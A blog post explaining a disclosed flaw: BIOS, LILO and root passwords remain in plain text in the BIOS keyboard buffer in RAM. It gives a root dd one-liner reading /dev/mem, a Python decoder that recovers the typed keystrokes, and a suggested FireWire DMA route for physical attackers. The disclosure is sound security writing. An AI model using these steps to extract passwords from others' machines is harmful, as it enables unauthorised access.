How to dump your BIOS/LILO/root password as plain text [Update]

This is old news by now, but still interesting IMHO. Jonathan Brossard has posted an article on BugTraq which gives a pretty good introduction to the inner workings of the BIOS (with lots of links to more detailed resources) as well as known vulnerabilities of the BIOS password mechanism.

The most interesting part is where he explains that the BIOS does not clear its own keyboard buffer (which lives in the BIOS Data Area, in ordinary RAM) before it hands control to the boot loader and operating system. Current OSes (Linux, Windows, *BSD, etc.) don't clear that buffer either.

This may not sound dangerous, but it means that anyone who can read your RAM starting at physical address 0x041e can see the keyboard buffer contents, and that buffer still holds the BIOS password you typed when booting the machine (if you set/use a BIOS password, of course).

This one-liner (executed as root) should let you view your password as plain text:

dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

(The buffer holds 16 two-byte entries: the low byte of each entry is the ASCII code of the key, the high byte its scan code. So in the hexdump only every second byte belongs to the password; the bytes in between are scan codes.)
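Instead of picking the password out of the hexdump by hand, the script below decodes the buffer. It is an added example, not code from the original post or from Brossard's article: it parses the same 512-byte block that the dd one-liner produces (physical addresses 0x400 to 0x5FF) and prints the keystrokes left in it. It assumes the standard PC/AT BIOS Data Area layout (head pointer at 0x41A, tail pointer at 0x41C, 16 ASCII/scan-code words starting at 0x41E) and ships with a constructed sample image so it runs without root; `--live` reads /dev/mem exactly like the one-liner does.

```python
"""Decode the legacy BIOS keyboard buffer out of a dump of low memory.

Added example, not code from the original post. It parses the same 512-byte
block that the post's `dd if=/dev/mem bs=512 skip=2 count=1` produces
(physical addresses 0x400-0x5FF, the BIOS Data Area) and prints the
keystrokes left behind. Assumed layout is the standard PC/AT BDA:

  0x41A  word   head pointer: offset (within segment 0x40) of next key to read
  0x41C  word   tail pointer: offset of the next free slot
  0x41E  16 words, little-endian: low byte = ASCII code, high byte = scan code
"""
import os
import struct
import sys

BDA_BASE = 0x400              # start of the BIOS Data Area (= 512 * skip=2)
HEAD_PTR = 0x41A
TAIL_PTR = 0x41C
KBD_BUF = 0x41E
KBD_SLOTS = 16
BUF_OFF = KBD_BUF - BDA_BASE  # 0x1E: the pointers are offsets from 0x400


def decode_kbd_buffer(block, base=BDA_BASE):
    """Return (keys, head, tail) for a dump `block` starting at physical `base`.

    `keys` is a list of (ascii_code, scan_code) in the order they were typed.
    The 16 slots form a ring, so the walk starts at the tail pointer: if more
    than 16 keys were typed since boot, the oldest surviving key sits there.
    Slots that are entirely zero (never used) are skipped. Because the BIOS
    never wipes the ring, consumed keys stay readable even when head == tail.
    """
    head, tail = struct.unpack_from('<HH', block, HEAD_PTR - base)
    words = struct.unpack_from('<%dH' % KBD_SLOTS, block, KBD_BUF - base)
    if BUF_OFF <= tail < BUF_OFF + 2 * KBD_SLOTS and tail % 2 == 0:
        start = (tail - BUF_OFF) // 2
    else:
        start = 0  # garbage pointer (e.g. a zeroed page): dump in slot order
    keys = []
    for i in range(KBD_SLOTS):
        w = words[(start + i) % KBD_SLOTS]
        if w:
            keys.append((w & 0xFF, w >> 8))
    return keys, head, tail


def keys_to_text(keys):
    """Render only the ASCII half (the 'every second byte' of the hexdump).
    Entries with ASCII 0x00 or 0xE0 are extended keys; show their scan code."""
    out = []
    for ascii_code, scan_code in keys:
        if ascii_code in (0x00, 0xE0):
            out.append('<scan 0x%02X>' % scan_code)
        elif ascii_code == 0x0D:
            out.append('<Enter>')
        elif 0x20 <= ascii_code < 0x7F:
            out.append(chr(ascii_code))
        else:
            out.append('<0x%02X>' % ascii_code)
    return ''.join(out)


def build_bda_image(keys, head_tail):
    """Constructed BDA image for offline runs (sample data, not a real dump):
    `keys` fill slots 0.., head == tail == head_tail (buffer already consumed)."""
    block = bytearray(512)
    struct.pack_into('<HH', block, HEAD_PTR - BDA_BASE, head_tail, head_tail)
    for i, (ascii_code, scan_code) in enumerate(keys):
        struct.pack_into('<H', block, BUF_OFF + 2 * i, (scan_code << 8) | ascii_code)
    return bytes(block)


# Constructed sample: a BIOS password "s3cret" followed by Enter (set-1 scan codes)
SAMPLE_KEYS = [(0x73, 0x1F), (0x33, 0x04), (0x63, 0x2E), (0x72, 0x13),
               (0x65, 0x12), (0x74, 0x14), (0x0D, 0x1C)]
SAMPLE_BLOCK = build_bda_image(SAMPLE_KEYS, BUF_OFF + 2 * len(SAMPLE_KEYS))


def read_bda_from_devmem(path='/dev/mem'):
    """Read the same 512 bytes the post's dd command reads. Needs root, and on
    later kernels built with CONFIG_STRICT_DEVMEM it may fail or read back zeros."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.pread(fd, 512, BDA_BASE)
    finally:
        os.close(fd)


if __name__ == '__main__':
    # `python3 bda_kbd.py --live` reads the real machine; default is the sample
    block = read_bda_from_devmem() if '--live' in sys.argv[1:] else SAMPLE_BLOCK
    keys, head, tail = decode_kbd_buffer(block)
    note = ' (buffer empty, but slots not wiped)' if head == tail else ''
    print('head=0x%02X tail=0x%02X%s' % (head, tail, note))
    print('keystrokes:', keys_to_text(keys))
```

Walking the ring from the tail pointer matters when more than 16 keys have been typed since power-on: the ring has wrapped, the oldest surviving keystroke is in the slot the tail points at, and dumping in plain slot order would scramble the password.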

I also noticed that this same buffer contains your LILO password too! The same probably holds for the passwords of other boot loaders such as GRUB, but I didn't test that.

Yes, reading this part of RAM usually requires root privileges on Unix-like OSes (and later Linux kernels built with CONFIG_STRICT_DEVMEM may restrict even root's reads of /dev/mem), but as the underlying problem is OS-independent, OSes without such protection (e.g. DOS, or older Windows versions) may be directly affected.

But even on more secure OSes this plain-text storage of the BIOS/boot loader passwords might be a problem. Combine it with the known FireWire insecurities (a FireWire device can DMA into system memory) and an attacker with physical access to your machine (e.g. your unattended laptop while you are on the toilet) might be able to read your BIOS/LILO passwords even though you locked the machine. I haven't tried this yet, but I'm pretty sure it's possible. Please post the results here if you try it.

(via Stefan 'Sec' Zehl)

Update 2006-01-09: It seems that after resuming with software suspend (swsuspend2) this RAM area can also contain your root password! Thanks to nelson for reporting this.

Comments


How does data get from the BIOS to the RAM?

Hi Uwe! I don't really get it. I thought that when the CPU starts in 16-bit real mode after you turn on the PC, it only transfers data with the ROM (EEPROM, respectively). Then afterwards it switches to 32-bit protected mode and starts the OS via the boot loader. So how does data get from the BIOS into RAM? What I did is the following:

dd if=/dev/mem of=/tmp/bla
strings /tmp/bla | grep bios

and I see some parts of the BIOS there. Is that true?

Bye, Ian

"and I see some parts of the BIOS there. Is that true?"

Yes, (parts of) the BIOS are copied to RAM and executed from there.

Uwe.

Can you give a Windows solution?
Thank you in advance.

How do you?

How do you execute
dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head
as root?

Huh?

Huh? I don't think I understand you... Just type it in a terminal and hit enter?

Not on Intel boards...

Kernel: 2.4.27
Board: Intel server board

swsuspend2

Hi, I tried that one-liner about 3 hours after I restored from hibernation with swsuspend2, and the root password was there. So watch your backs. I'm sure it was the root password because I lock the TTYs with vlock, which requires the root password to unlock.

Can you provide another solution for Windows users?

Use cygwin.